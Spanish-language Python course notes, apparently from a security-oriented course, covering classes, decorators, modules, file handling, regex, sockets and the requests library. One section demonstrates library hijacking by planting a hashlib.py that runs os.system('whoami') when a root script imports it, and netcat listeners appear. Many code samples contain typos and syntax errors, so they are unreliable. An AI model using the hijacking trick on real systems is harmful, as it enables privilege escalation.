print(f"La pizza tiene {self.size} y los ingredientes son: {", ".join(self.ingredientes)}")
pizza = Pizza(12, "Chorizo", "Jamón", "Tocineta", "Queso")
Métodos especiales 3
#!/usr/bin/env python3
class MiLista:
def __init__(self):
self.data = [1, 2, 3, 4, 5]
# Para traer un elemento de una lista representada como atributo
def __getitem__(self, idx):
return self.data[idx]
lista = MiLista()
print(lista)
Métodos especiales 4
#!/usr/bin/env python3
class Saludo:
def __init__(self, saludo):
self.saludo = saludo
# Hay un método especial llamado call
def __call__(self):
return f"{self.saludo} {nombre}!"
hola = Saludo("¡Hola")
print(hola("Katya"))
Métodos especiales 5
#!/usr/bin/env python3
class Punto:
p1 = Punto(2, 8)
p2 = Punto(4, 9)
print(p1 + p2) # Aquí se rompe python porque no sabe que es.
# 2+4=6, 9+8=17
class Punto:
def __init__(self, x, y):
self.x = x
self.y = y
def __add__(self, otro):
# Crear un objeto temporal
return Punto(self.x + otro.x, self.y + otro.y)
def __str__(self):
return f"({self.x}, {self.y})"
p1 = Punto(2, 8)
p2 = Punto(4, 9)
print(p1 + p2)
Métodos especiales 6
#!/usr/bin/env python3
class Contador:
def __init__(self, limite):
self.limite = limite
# Crear un iterador sobre un objeto
def __iter__(self):
self.contador = 0
return self
def __next__(self): # Igual que al bucle while, devolver el iterador y definir que pasa cada iteración
if self.contador < self.limite:
self.contador += 1
return self.contador
else:
raise StopIteration
c = Contador(5)
for i in c:
print(i)
Decoradores y propiedades
Hasta ahora se han visto algunos decoradores
@property
Para no alterar el código de una función o método de una clase, pero si puede hacer muchas cosas más.
Decoradores 1
#!/usr/bin/env python3
def saludo():
print("Hola, estoy saludando desde la función")
# Para expandir la función se crea una función de orden superior
def mi_decorador
# Necesitamos una envoltura, para apartir de ahora la función saludo se convierte en envoltura, es como una alteración, y retornarla
def mi_decorador(funcion):
def envoltura():
print("Estoy saludando en la envoltura antes de llamar a la función")
funcion()
print("Estoy saludando en la envoltura después de llamar a la función")
return envoltura
@mi_decorador
def saludo():
print("Hola, estoy saludando desde la funcióm")
salud()
#----
@property # Trabaja con Setters y Getters
class Persona:
def __init__(self, nombre, edad):
# Atributos protegidos, externamente no se ven pero si se pueden manipular
self._nombre = nombre
self._edad = edad
# Cómo desde fuera se puede actualizar los valores?
@property # Crear una nueva propiedad
# Aquí se trabaja set y get:
def edad(self): # GET
return self._edad
@edad.setter # CON DECORADOR ES SET
def edad(self, edad):
if edad > 0:
self._edad = edad
else:
raise ValueError("No puedes poner la edad")
sasha = Persona("Sasha", 21)
Propiedades 1
#!/usr/bin/env python3
import time
def pausa_corta():
time.sleep(1)
def pausa_larga():
time.sleep(5)
# Usando propiedades especiales custom
def cronometro(funcion):
def envoltura():
inicio = time.time()
funcion()
final = time.time()
print(f"El tiempo total transcurrido en la función {funcion.__name__} es: {final - inicio}")
# -> Para saber el nombre de la función {funcion.__name__}
return envoltura
@cronometro
def pausa_corta():
time.sleep(1)
@cronometro
def pausa_larga():
time.sleep(2)
pausa_corta()
pausa_larga()
#----
# Cuidado porque pueden haber errores
def cronometro(funcion):
def envoltura(num): # -> La envoltura debe contemplar los parametros que recibe la función original
inicio = time.time()
funcion(num) # -> Aquí tambien
final = time.time()
print(f"El tiempo total transcurrido en la función {funcion.__name__} es: {final - inicio}")
return envoltura
@cronometro
def pausa_corta(numero):
time.sleep(numero)
@cronometro
def pausa_larga(numero):
time.sleep(numero)
pausa_corta(2)
pausa_larga(3)
#----
def cronometro(funcion):
def envoltura(*args, **kwargs): # Argumentos posicionales, o argumentos de pares clave/valor
inicio = time.time()
funcion(num)
final = time.time()
print(f"El tiempo total transcurrido en la función {funcion.__name__} es: {final - inicio}")
return envoltura
@cronometro
def pausa_corta(numero):
time.sleep(numero)
@cronometro
def pausa_larga(numero):
time.sleep(numero)
pausa_corta(2, 3, 4, 5, 6) # Pasar una serie de elementos y se transforman como tupla
pausa_larga(nombre = "Kizaru", edad = 17, profesion = "Rapper") # Aquí la envoltura recibe su segundo argumento
Métodos especiales (*args) 2
#!/usr/bin/env python3
def suma(*args):
print(type(args))
return sum(args)
print(suma(2, 3, 5, 6, 9, 10))
Métodos especiales (**kwargs) 1
#!/usr/bin/env python3
def presentacion(**kwargs):
print(type(kwargs))
print(kwargs)
for clave, valor in kwargs.items():
print(f"{clave}: {valor}")
print(presentacion(nombre = "Asya", edad = 23, ciudad = "Vladivostok", profecion = "Programmer"))
Propiedades 2
#!/usr/bin/env python3
class Circunferencia:
def __init__(self, radio):
self._radio = radio
@property
def radio(self): # Getter
return self._radio
@radio.setter
def radio(self, num): # Setter
self._radio = num
@property
def diametro(self):
return 2 * self._radio
@property
def area(self):
return 3.1416 * (self._radio ** 2)
c = Circunferencia(5)
print(c.radio)
print(c.diametro)
print(c.area)
c.radio = 10
Módulos y Paquetes
Organización de Código en Módulos
En este punto se ha trabajado muy bien la Programación Orientada a Objetos, y la organización de nuestros programas ha sido mucho mas estructurada. Ahora podemos dar el salto a los Módulos.
Un módulo es un archivo de python que tiene sus clases, funciones, importaciones y permite un código limpio mucho mejor a lo que se ha venido trabajando.
Para entender el concepto tenemos el siguiente ejemplo: Hay un archivo llamado math_operations.py:
Math_operations.py
#!/usr/bin/env python3
def suma(x, y):
return x + y
def resta(x, y):
return x - y
def multiplicacion(x, y):
return x * y
def division(x, y):
if y == 0:
raise ValueError("No es posible dividir un número entre cero")
else:
return x / y
Vamos a reutilizar estas funciones desde main.py:
Main.py
#!/usr/bin/env python3
# Importamos el código de math_operations y mucho más limpio nos queda
import math_operations
from math_operations import suma, resta, multiplicacion, division
print(math_operations.suma(5, 2))
print(suma(6, 4))
Así mismo python nos brinda un par de estos módulos, para nosotros poder importarlos:
import math -> Para importar operaciones matemáticas
Para saber que funciones tiene declarado el módulo:
import math
print(dir(math)
Así como el módulo math, python cuenta con una serie de módulos que podemos importar y que no requieren de un script:
python3
>>> import sys
>>> print(sys.builtin_module_names)
>>> ('_abc', '_ast', '_codecs', '_collections', '_functools', '_imp', '_io', '_locale', '_operator', '_signal', '_sre', '_stat', '_string', '_suggestions', '_symtable', '_sysconfig', '_thread', '_tokenize', '_tracemalloc', '_typing', '_warnings', '_weakref', 'atexit', 'builtins', 'errno', 'faulthandler', 'gc', 'itertools', 'marshal', 'posix', 'pwd', 'sys', 'time')
Por otro lado, es bueno saber la diferencia entre estos módulos que el propio python tiene integrados, a los diferentes módulos que requieren de un script por ejemplo en Procesamiento de Lenguaje Natural tenemos python-keras, nltk, spicy, numpy que requieren de un script para poder ser importados.
Importación y uso de Módulos
Esta sección es un breve repaso a la anterior. Hay un ataque llamado Library Hijacking ya que hay una forma de secuestrar librerias/módulos de python.
import math
print(math.sqrt(49))
#---
# Lo que se suele hacer es
from math import sqrt
print(sqrt(16))
Algunas veces algunos módulos que importamos tienen nombres muy largos y complejos, para que sea más manejable en el código se hace:
import math as m # El módulo math ahora se llama m, por tanto ahora se usa:
print(m.sqrt(91))
El concepto de Library Hijacking se puede ver de la siguiente manera:
python3
>>> import hashlib
>>> # ¿Cómo sabe el sistema si este módulo existe como tal?, Cómo realiza las búsquedas?
Es similar al PATH, en bash:
echo $PATH
Por tanto, un módulo es un archivo python con funciones, clases y definiciones. Y entra el concepto de ‘Librería’ que es un poco más extenso ya que contiene muchos más módulos y brindan una funcionalidad.
python3
>>> import sys
>>> print(sys.path)
>>> ['', '/usr/lib/python313.zip', '/usr/lib/python3.13', '/usr/lib/python3.13/lib-dynload', '/usr/lib/python3.13/site-packages']
>>> # Al importar hashlib, ¿Qué pasa por detras?
>>> import hashlib
>>> # Podemos ver un par de rutas y lo que se hace, es mirar si en cada una de estás rutas se encuentra hashlib como módulo
>>> # ['', '/usr/lib/python313.zip', -> No lo encuentra
>>> # '/usr/lib/python3.13', -> Lo encuentra
>>> # Aquí se carga y podemos usar hashlib, pero cuidado con el path, especificamente : ['',
>>> # Viene así por defecto, y nos permite un library hijacking
>>> # Se puede crear un archivo hashlib.py en el directorio actual de trabajo y definir nosotros la funcionalidad
import os
os.system("whoami")
No estamos modificando el archivo original, estamos creando uno completamente nuevo en el directorio actual de trabajo.
El archivo hashlib.py que hemos creado le cambiamos el nombre a test.py:
mv hashlib.py test.py
import hashlib
cadena = b"Hola" # La b siginifica que estamos pasando los cadena como bytes
hashlib.md5(cadena).hexdigest() # -> Convierte la cadena a md5
MD5 es un algoritmo de reducción criptográfico de 128 bits, utilizado para comprobar la integridad de los archivos y saber que no han sido modificados
Ahora vamos a renombrar test.py a hashlib.py:
mv test.py hashlib.py
Y recordando que el contenido de nuestro hashlib.py es:
import os
os.system("whoami")
Al momento de ejecutar main.py:
root
Esto se debe a que python, empieza a buscar desde el directorio actual de trabajo. Esto es critico ya que nos permite la inyección de comandos en caso de tener permisos de escritura y ejecutar archivos como root.
Entrada y Salida de Datos
Entrada y salida por teclado
Al momento de ejecutar un script, este nos puede solicitar datos, para ingresar datos se gestiona con ‘input’:
nombre = input("Dime tu nombre: ")
print(nombre)
# Siempre que querramos recibir por teclado una entrada que no es tipo string, hay que hacer type casting
edad = int(input("Dime tu edad: "))
pi = float(input("Cuánto vale PI: "))
# Se puede usar try except
try:
edad = int("Dime tu edad") # pero si ingreso hola
print(f"Tu edad es {edad}")
break
except ValueError:
print("Dato no válido ingresado")
Otra forma interesante es importando getpass para recibir por teclado contraseñas:
from getpass import getpass
contraseña = getpass("Ingresa tu contraseña: ")
print(f"La contraseña es {contraseña}")
Lectura y escritura de archivos
Se pueden abrir archivos y leer su contenido, editarlo y es algo sencillo:
# example.txt ("¡Hola mundo!")
f = open("example.txt", "w") # w: escribir pero si habia contenido antes se borrara, r: leer, a: te agrega al final del archivo
f.write("¡Hola mundo!")
f.close() # Para cerrar el archivo
with open("example.txt", "w") as f:
f.write("Hola mundo")
# De está manera python cierra el archivo de forma automática
with open("/etc/hosts", "r") as f: # Algunas ocasiones por error utf8, hay que poner rb rawbinary
file_content = f.read()
# Leer linea por linea
for line in f:
print(line.strip())
print(file_content)
with open("/ruta/imagen.png", "rb") as f_in, open("imagen.png", w) as f_out:
file_content = f_in.read()
f_out.write(file_content)
Formateo de cadenas
nombre = "Tanya"
print("Hola, me llamo {}, y tengo {} años".format(nombre, 29))
print("Hola, me llamo {1}, y tengo {0} años".format(29, nombre))
print(f"Hola, me llamo {nombre}, y tengo {29} años")
#-----
cadena = " hola"
print(cadena.strip()) # hola
cadena = "Hola Mundo"
print(cadena.lower()) # Minúsculas
print(cadena.upper()) # Mayúsculas
print(cadena.replace('0', 'x'))
print(cadena.split()) # Crea una lista
cadena = "hola:mundo, test"
print(cadena.split(':'))
print(cadena[0]) ## 1, 2 ... es un iterable
#-----
cadena = "hola mundo"
print(cadena.startswith('h')) # Devuelve True o False
print(cadena.endswith('g'))
#-----
print(cadena.find("mundo")) # la posición donde comienza la cadena a buscar, si no existe retorna -1
print(cadena.index("silla")) # si no existe, retorna una excepción
.count() -> para contar
.swapcase() -> minúsculas a mayúsculas y vice
.isalpha() -> "123123" -> True
.isspace() -> " " -> True
cadena = ["hola", "mundo"]
print(" ".join(cadena)) -> unir cadenas
.replace(',','') "a,b,c,d,e,f,g" -> (abcdefg)
s = "Hola me gusta mucho comer helado y cocholate"
tabla = str.maketrans('aei','zpo') # Sustituciones avanzadas
nueva_cadena = s.translate(tabla)
Proyectos de POO para reforzar
Proyecto - Gestión de Biblioteca
#!/usr/bin/env python3
class Libro:
def __init__(self, id_libro, autor_libro, nombre_libro):
self.id_libro = id_libro
self.autor_libro = autor_libro
self.nombre_libro = nombre_libro
self.esta_prestado = False
def __srt__(self):
return(f"[+] Libro: ({self.id_libro}, {self.autor_libro}, {self.nombre_libro})")
def __repr__(self):
return self.__str__()
class Biblioteca:
def __init__(self):
self.libros = {}
def agregar_libro(self, libro):
if libro.id_libro not in self.libros:
self.libros[libro.id_libro] = libro
else:
print(f"[!] No es posible agregar el libro con id: {libro.id_libro}")
def prestar_libro(self, id_libro):
if id_libro in self.libros and not self.libros[id_libro].esta_prestado:
self.libros[id_libro].esta_prestado = True
else:
print(f"[!] No es posible prestar el libro con el id: {id_libro}")
@property
def mostrar_libros(self):
return [for libro in self.libros.values() if not libro.esta_prestado]
@property
def mostrar_libros_prestados(self):
return [for libro in self.libros.values() if libro.esta_prestado]
class BibliotecaInfantil(Biblioteca):
def __init__(self):
super().__init__()
self.libros_para_ninos = {}
def agregar_libro(self, libro, es_para_ninos):
super().agregar_libro(libro)
self.libros_para_ninos[libro.id_libro] = es_para_ninos
def prestar_libro(self, id_libro, es_nino):
if id_libro in self.libros and self.libros_para_ninos[id_libro] == es_nino and not self.libros[id_libro].esta_prestado:
self.libros[id_libro].esta_prestado = True
else:
print(f"[!] No es posible prestar el libro con el id: {id_libro}")
if __name__ == '__main__':
biblioteca = Biblioteca()
libro1 = Libro(1, "Miguel García", "Cadaveres de Gato")
libro2 = Libro(2, "Rafael Pombo", "El renacuajo paseador")
biblioteca.agregar_libro(libro1, es_para_ninos=False)
biblioteca.agregar_libro(libro2, es_para_ninos=True)
print(f"[+] Libros en la biblioteca: {biblioteca.mostrar_libros}")
biblioteca.prestar_libro(1, es_nino=False)
print(f"[+] Libros en la biblioteca prestados: {biblioteca.mostrar_libros_prestado}")
Proyecto - Tienda de animales
#!/usr/bin/env python3
class Animal:
def __init__(self, nombre, especie):
self.nombre = nombre
self.especie = especie
self.alimentado = False
def alimentar(self):
self.alimentado = True
def vender(self):
self.alimentado = False
def __str__(self):
return f"{self.nombre} ({self.especie} - {'Alimentado' if self.alimentado else 'Hambriento'})"
class TiendaAnimales:
def __init__(self, nombre):
self.nombre = nombre
self.animales = []
def agregar_animal(self, animal):
self.animales.append(animal)
def mostrar_animales(self):
for animal in self.animales:
print(animal)
def alimentar_animales(self):
for animal in self.animales:
animal.alimentar()
def vender_animal(self, nombre):
for animal in self.animales:
if self.animal == nombre:
animal.vender()
self.animales.remove(animal)
return
print(f"[!] No se ha encontrado ninguna animal en la tienda con nombre {nombre}")
if __name__ == '__main__':
tienda = TiendaAnimales("Veterinaria Cuba")
gato = Animal("Shisha", "Gato")
perro = Animal("Nichc", "Perro")
tienda.agregar_animal(gato)
tienda.agregar_animal(perro)
tienda.mostrar_animales()
tienda.alimentar_animales()
print("[+] Mostrando los animales una vez estos han sido alimentados")
tienda.mostrar_animales()
tienda.vender_animal("Shisha")
Proyecto - Administración de vehículos
#!/usr/bin/env python3
class Vehiculo:
def __init__(self, matricula, modelo):
self.matricula = matricula
self.modelo = modelo
self.disponible = True
def alquilar(self):
if self.disponible:
self.disponible = False
else:
print("[!] El vehículo con mátricula {self.matricula} no se puede devolver porque no ha sido alquilado a nadie")
def devolver(self):
if not self.disponible:
self.disponible = True
else:
print("[!] El vehículo con mátricula {self.matricula} no se puede alquilar")
def __str__(self):
return f"Vehiculo ({self.matricula}, {self.modelo}, esta diponible={self.disponible})"
class Flota:
def __init__(self):
self.vehiculos = []
def agregar_vehiculo(self, vehiculo):
self.vehiculos.append(vehiculo)
def alquilar_vehiculo(self, matricula):
for vehiculo in self.vehiculos:
if vehiculo.matricula == matricula:
vehiculo.alquilar()
def devolver_vehiculo(self, matricula):
for vehiculo in self.vehiculos:
if vehiculo.matricula == matricula:
vehiculo.devolver()
def __str__(self):
return f"[+] La flota dispone de: ".join(str(vehiculo) for vehiculo in self.vehiculos)
if __name__ == '__main__':
flota = Flota()
flota.agregar_vehiculo(Vehiculo("BABDAS6", "Toyota Corolla"))
flota.agregar_vehiculo(Vehiculo("FG341S3", "Honda Civic"))
print("[+] Flota inicial:\n")
print(flota)
flota.alquilar_vehiculo("BABDAS6")
print("Mostrando la flota después de haber alquilado el Toyota")
print(flota)
flota.devolver_vehiculo("BABDAS6")
print(flota)
Proyecto - Gestión de notas
Aquí vamos a usar la serialización y deserialización de datos en python usando la librería Pickle. Esta librería nos permite transformar un objeto a un formato el cual permite ser almacenado en disco, por otro lado la deserialización trae los bytes y hace el proceso inverso para convertir los bytes a un objeto legible.
Es importante aclarar que los objetos que se trabajan con Pickle no son los mismos de la programación orientada a objetos ya que no es el mismo contexto. Aquí convertimos un tipo de dato a una secuencia de bytes y viceversa
#!/usr/bin/env python3
import os
from gestor_notas import GestorNotas
def main():
gestor = GestorNotas()
while True:
print(f"\n---------------\nMENÚ\n---------------")
print("1. AGREGAR UNA NOTA")
print("2. LEER TODAS LAS NOTAS")
print("3. BUSCAR POR UNA NOTA")
print("4. ELIMINAR UNA NOTA")
print("5. SALIR")
opcion = int(input("\n[+] ESCOGE UNA OPCIÓN: "))
if opcion == 1:
contenido = input("\n[+] Contenido de la nota: ")
gestor.agregar_nota(contenido)
elif opcion == 2:
notas = gestor.leer_notas()
print("[+] Mostrando todas las notas")
for i, nota in enumerate(notas):
print(f"{i+1}: {nota}")
elif opcion == 3:
texto_busqueda = input(\n"[+] Ingresa el texto a buscar como criterio en las notas: ")
notas = gestor_buscar_nota(texto_busqueda)
print(f"\n[+] Mostrando las notas que coinciden con el criterio de búsqueda:\n")
for i, nota in enumerate(notas):
print(f"{i+1}, {nota}")
elif opcion == 4:
index = int(input("[+] Introduce el índice de la nota que quieres borrar: "))
gestor.eliminar_nota(index)
elif opcion == 5:
break
else:
print("\n[!] La opción ingresada es incorrecta")
input("[+] Presiona <Enter> para continuar....")
os.system('cls' if os.name == 'nt' else 'clear')
if __name__ == "__main__":
main()
#!/usr/bin/env python3
# Gestor_notas.py
import pickle
from notas import Nota
class GestorNotas:
def __init__(self, archivo_notas='notas.pkl'):
self.archivo_notas = archivo_notas
try:
with open(self.archivo_notas. 'rb') as f:
self.notas = pickle.load(f)
except FileNotFoundError:
self.notas = []
def guardar_notas(self):
with open(self.archivo_notas, 'wb') as f:
pickle.dump(self.notas, f)
def agregar_nota(self, contenido):
self.notas.append(Nota(contenido))
self.guardar_notas()
def leer_notas(self):
return self.notas
def buscar_nota(self, texto_busquedea):
return [nota for nota in self.notas if nota.coincide(texto_busqueda)]
def eliminar_nota(self, index):
if index < len(self.notas):
del self.notas[index]
self.guardar_notas()
else:
print("\n[!] El índice proporcionado es incorrecto")
#!/usr/bin/env python3
# Notas.py
class Nota:
def __init__(self, contenido):
self.contenido = contenido
def coincide(self, texto_busqueda):
return texto_busqueda in self.contenido
def __str__(self):
return self.contenido
Biblioteca estándar y herramientas adicionales
Manejo de fechas y horas
Después de el trabajo de todos los proyectos, se trabajará un concepto muy sencillo el cual es el manejo de fechas y horas.
import datetime
# Saber con precisión la fecha y hora actual
ahora = datetime.datetime.now()
print(ahora) # 2025-1-2 20:03:27.245623
# Fecha
fecha = datetime.date(2024, 5, 24)
# Hora
hora = datetime.time(14, 15, 15)
# Fecha y hora
fecha_hora = datetime.datetime(2025, 5, 24, 14, 15, 15)
# Se puede dividir por secciones
año = ahora.year
mes = ahora.month
dia = ahora.day
horas = ahora.hour
minutos = ahora.minute
segundos = ahora.second
print(f"Año: {año}, mes: {mes}, día: {dia}, horas: {horas}, minutos: {minutos}, segundos: {segundos}")
Expresiones Regulares
Las expresiones regulares o Regex, son patrones utilizados para encontrar una determinada combinación de caracteres dentro de una cadena de texto. Se crea un patrón o un filtro para detectar coincidencias en una cadena.
import re
text = "Mi gato está en el tejado y mi otro gato está en el jardín"
matches = re.findall("gato", text)
print(matches) # Imprime en formato lista
text = "Hoy estamos a fecha 10/10/2007, mañana estaremos a 11/10/2007"
matches = re.findall("\d{2}\/\d{2}\/\d{4}", text) # Hay un digito:\d de 2 números{2}, la barra hay que escaparla
text = "Los usuarios pueden contactarnos a soporte@gmail.com o info@gmail.com"
matches = re.findall("(\w+)@(\w+\.\w{2,})", text) # Caracteres y números hasta el '@' con el +, el '.' es un caracter especial, hay que escaparlo con '\.', y el domio puede ser '.io o .co, .com' por tanto, se utiliza '\w{2,}' minimos 2 hasta donde termine.
# La librería re permite hacer sustituciones
texto = "Mi gato está en el tejado y mi perro está en el jardín"
nuevo_texto = re.sub("gato", "perro", texto)
# También splits
texto = "Campo1,Campo2,Campo3,Campo4"
nuevo_texto = re.split(",", texto)
Validador de correo electrónico
#!/usr/bin/en python3
import re
def validar_correo(correo):
patron = "[A-Za-z0-9._+-]+@[A-Za-z0-9]+\.[A-Za-z]{2,}"
if re.findall(patron, correo):
return True
else:
return False
print(validar_correo("soporte@gmail.com"))
Dentro de regex hay un carácter especial llamado ‘\b’ que funciona como delimitador de cadenas (car, cart, masticar, magicarp)
#!/usr/bin/env python3
import re
text = "car, cart, masticar y magicarp"
re.findall("car", text) # Lo va a encontrar 4 veces
re.findall(r"\bcar", text) # La cadena debe empezar con cart
re.findall(r"car\b", text) # La cadena debe terminar con car
import re
texto = "Hoy estamos a día 10/10/2007 y mañana estaremos a 11/10/2007"
patron = r"\b(\d{2}\/\d{2}/\d{4})\b"
# Iterar
for match in re.finditer(patron, texto):
print(match.group(0))
Manejo de archivos y directorios
Esto es importante porque hay momento al hacer scripts en python, para leer archivos o tomar acciones en caso de que los directorios existan y tomar un rumbo de acción en la lógica de nuestro programa.
import ps
if os.path.exists("mi_archivo.txt"):
print("existe")
else:
print("no existe")
if not os.path.exists("mi_directorio"):
os.mkdir("mi_directorio")
if not os.path.exists("mi_directorio/mi_subdirectorio"):
os.makedirs("mi_directorio/mi_subdirectorio")
Crear 5 archivos llamados file.txt
for i in $(seq 1 5); do touch file$i.txt; done
import os
recursos = os.listdir()
for recurso in recursos:
print(recurso)
if os.path.exists("file1.txt"):
os.remove("file1.txt")
os.rmdir("diretory")
# Para directorios anidados
import shutil
import os
if os.path.exists("mi_directorio"):
shutil.rmtree("mi_directorio")
if os.path.exists("file2.txt"):
os.rename("file2.txt", "cambiado.txt")
if os.path.exists("/etc/passwd"):
tam = os.path.getsize("/etc/passwd")
print(tam)
import os
ruta = os.path.join("mi_directorio", "mi_archivo.txt")
print(ruta) # mi_directorio/mi_archivo.txt
# Basename ruta final
archivo = os.path.basename(ruta)
print(archivo) # mi_archivo.txt
# dirname
directorio = os.path.dirname(ruta)
print(directorio) # mi_directorio
#----
directorio, archivo = os.path.split(ruta)
Conexiones de red y protocolos
Una clase muy importante en la creación de exploits, debido a que se establecen muchas comunicaciones con servicios y nosotros mismos. Vamos a usar la librería socket para TCP/UDP.
Socket: Designa un concepto abstracto donde 2 procesos se intercambian datos mediante una comunicación.
Si nos ponemos en escucha con nc en un puerto para recibir conexiones entrantes (Servidor), y luego un cliente cuando hablamos de TCP:
nc -nlvp 1234
nc localhost 1234
Server.py
import socket
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ## ipv4 y TCP
server_address = ('localhost', 1234)
server_socket.bind(server_address) # Estamos en escucha, y por ahora 1 unica conexión
# Límite de conexiones
server_socket.listen(1)
while True:
client_socket, client_address = server_socker.accept() # Aceptar conexión entrante
data = cliennt_socket.recv(1024) # Recibir datos
print(f"[+] Mensaje recibido del cliente: {data.decode()}")
print(f"[+] Información del cliente que se ha comunicado con nosostros: {client_address}")
client_socket.sendall(f"Un saludo\n".encode())
client_socket.close()
Client.py
import socket
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('localhost', 1234)
client_socket.connect(server_address)
try:
message = b"Este es un mensaje de prueba"
client_socket.sendall(message)
data = client_socket.recv(1024)
print(f"[+] El servidor nos ha respondido con este mensaje: {data.decode()}")
finally:
cliente_socket.close()
Server.py
import socket
def start_server():
host = 'localhost'
port = 1234
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((host, port))
print(f"[+] Servidor en escucha en {host}, {port}")
s.listen(1)
conn, addr = s.accept()
with conn:
print(f"[+] Se ha conectado un nuevo cliente: {addr}")
while True:
data = conn.recv(1024)
if not data:
break
conn.sendall(data)
start_server()
Cliente.py
import socket
def start_client():
host = 'localhost'
port = 1234
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((host, port))
s.sendall(b"Hola, servidor!")
data = s.recv(1024)
print(f"{data.decode()}")
start_client()
Cuando hablamos de UDP
Server.py
import socket
def start_udp_server():
host = 'localhost'
port = 1234
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.bind((host, port))
print(f"[+] Servidor UDP Iniciado en {host}:{port}")
while True:
data, addr = s.recvfrom(1024)
print(f"[+] Mensaje enviado por el cliente: {data.decode()}")
print(f"[+] Información del cliente : {addr}")
start_udp_server()
nc localhost 1234 -u
Cliente.py
import socket
def start_upd_client():
host = 'localhost'
port = 1234
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
s.sendto(b"Hola, aqui estamos tensandola", (host, port)) # las tildes no hacen parte del ASCII .encode("utf-8")
start_udp_client()
Vamos a manejar multiples conexiones haciendo uso de la biblioteca Threading que veremos a profundidad más adelante
Server.py
import socket
import threading
import pdb # Para debuggear
class ClientThread(threading.Thread):
def __init__(self, client_sock, client_addr):
super().__init__()
self.client_sock = client_sock
self.client_addr = client_addr
print(f"[+] Nuevo cliente Conectado: {client_addr}")
def run(self):
message = ''
while True:
data = self.client_sock.recv(1024)
message = data.decode()
pdb.set_trace() # p message tiene un salto de línea
if message.strip() == "bye":
break
print(f"[+] Mensaje enviado por el cliente: {message.strip()}")
self.client_sock.send(data)
print(f"[!] Cliente {client_addr} desconectado")
self.client_sock.close()
HOST = 'Localhost'
PORT = 1234
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket:
# Las propiedades de un socket están en niveles y se pueden modificar
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # 1: nivel, 2: propiedad a alterar, 3:la igualdad que se quiere establecer TIME_WAIT
server_socket.bind((HOST, PORT))
print(f"[+] En espera de conexiones entrantes...")
while True:
server_socket.listen()
client_sock, client_addr = server_socket.accept()
#threading.Thread(target=mi_funcion, args=(client_sock, client_addr))
#new_thread.start()
new_thread = ClientThread(client_sock, client_addr)
new_thread.start()
Cliente.py
import socket
def start_client():
host = 'localhost'
port = 1234
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((host, port))
while True:
message = input("[+] Introduce tu mensaje: ")
s.sendall(message.decode())
if message == 'bye':
break
data = s.recv(1024)
print(f"[+] Mensaje de respuesta del servidor {data.decode()}")
start_client()
Como podríamos crear un chat entre el servidor y el cliente:
Server.py
import socket
def start_chat_server():
host = 'localhost'
port = 1234
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # TIME_WAIT
server_socket.bind((host, port))
server_socket.listen(1)
print(f"[+] Servidor listo para aceptar una conexión...")
connection, client_addr = server_socket.accept()
print(f"[+] Se ha conectado el cliente {client_addr}")
while True:
client_message = connection.recv(1024).strip().decode()
print(f"[+] Mensaje del cliente: {client_message}")
if client_message = 'bye':
break
server_message = input("[+] Mensaje para el cliente: ")
connection.send(server_message.encode())
connection.close()
start_chat_server()
import socket
def start_chat_client():
host = 'localhost'
port = 1234
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((host, port))
while True:
client_message = input(f"[+] Mensaje para enviar al servidor: ")
client_socket.send(client_message.encode())
if client_message == 'bye':
break
server_message = client_socket.recv(1024).strip().decode()
print(f"[+] Mensaje del servidor: {server_message}")
client_socket.close()
start_chat_client()
Manejo de librerías comunes
Librería OS y SYS
El uso de la librería os y sys es muy comun:
import os
directorio_actual = os.getcwd() # pwd
print(f"[+] Directorio actual de trabajo: {directorio_actual}")
files = os.listdir(directorio_actual)
print(type(files))
print("[+] Listando los archivos existentes en el directorio")
for file in files:
print(file)
os.mkdir("mi_directorio") # Crear directorio
print(f"[+] ¿Existe el archivo 'mi_archivo.txt' -> {os.path.exists('mi_archivo.txt')}")
# Traer variables de entorno
get_env = os.getenv('KITTY_INSTALLATION_DIR')
Para scripts sys, esta muy bien
import sys
print(f"[+] Nombre del script: {sys.argv[0]}")
print(f"[+] Total argumentos que se estan pasando {len(sys.argv)}")
sys.exit(1) # Salir con códigos de estado
# Para el library hijacking
python3 -c 'import sys; print(sys.path)'
Librería REQUEST
Se utiliza mucho para el Hacking Web, es muy importante saber utilizarla para hacer explotaciones web, PS: no poner de nombre requests al archivo python que estemos trabajando.
# Hacer consulta a google
import requests
response = requests.get("https://google.es") # Tiene un código de estado, un código fuente
print(f"[+] Status code: {response.status_code}")
print(f"[+] Código fuente de la respuesta:")
with open("index.html", "w") as f:
f.write(response.text)
Abrir un servidor http con python
python3 -m http.server 80
import requests
values = {"key1": "value1", "key2": "value2", "key3":"value3"}
response = requests.get("https://httpbin.org/get", params=values)
print(response.url)
print(reponse.text)
# Por post
payload = {"key1": "value1", "key2": "value2", "key3":"value3"}
# Se puede cambiar la cabecera
headers = {'User-Agent': 'my-app/1.0.0'}
response = requests.get("https://httpbin.org/post", data=payload, headers=headers)
Python también permite manejar excepciones:
import requests
# Limitar tiempo
try:
response = requests.get("https://google.es", timeout=1)
response.raise_for_status()
except requests.Timeout:
print(f"[!] La petición ha excedido el tiempo límite de espera")
except requests.HTTPError as http_err:
print(f"[!] Error HTTPS: {http_err}")
except requests.RequestsException as err:
print(f"[!] Error: {err}")
else:
print(f"[+] No ha habido ningún error")
En algunos casos las respuestas están en json
curl -s -X GET "https://httpbin.org/get"
Pero python también tiene una forma de manejar este formato
import requests
response = requests.get("https://httpbin.org/get")
data = response.json()
print(data)
if 'headers' in data and 'User-Agent' in data['headers']:
user_agent = data['headers']['User-Agent']
print(f"[+] User-Agent : {user_agent}")
else:
print("[!] No existe este campo en la respuestas")
También podemos autenticarnos:
import requests
response = requests.get("https://httpbin.org/basic-auth/foo/bar", auth=('foo', 'foo'))
print(response.status_code)
print(response.text)
Cambiar Cookie
import requests
cookies = dict(cookies_are='working')
